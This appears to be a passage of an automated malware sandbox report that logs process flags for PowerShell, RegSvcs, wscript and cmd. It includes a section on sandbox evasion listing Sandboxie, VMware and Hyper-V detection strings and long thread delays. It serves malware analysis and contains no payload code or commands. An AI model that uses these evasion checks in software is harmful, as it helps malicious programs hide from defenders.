        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: Yara matchFile source: 0000000D.00000002.3418123386.0000000003431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.3391172871.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1524, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6100, type: MEMORYSTR
        Source: RegSvcs.exe, 0000000D.00000002.3418123386.0000000003431000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.3391172871.0000000002C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4245Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5639Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4958Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4855Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 9299Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 555Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9457
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4216Thread sleep time: -11068046444225724s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6696Thread sleep count: 4958 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6696Thread sleep count: 4855 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5316Thread sleep time: -11990383647911201s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1960Thread sleep count: 9457 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2472Thread sleep time: -22136092888451448s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6764Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
        Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
        Source: wscript.exe, 00000006.00000002.2367207456.0000024CAC751000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: RegSvcs.exe, 00000016.00000002.3391172871.0000000002C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
        Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
        Source: RegSvcs.exe, 0000000D.00000002.3429100433.0000000005A50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000002.00000002.2371650540.000001CC6F1F7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3429100433.0000000005A50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
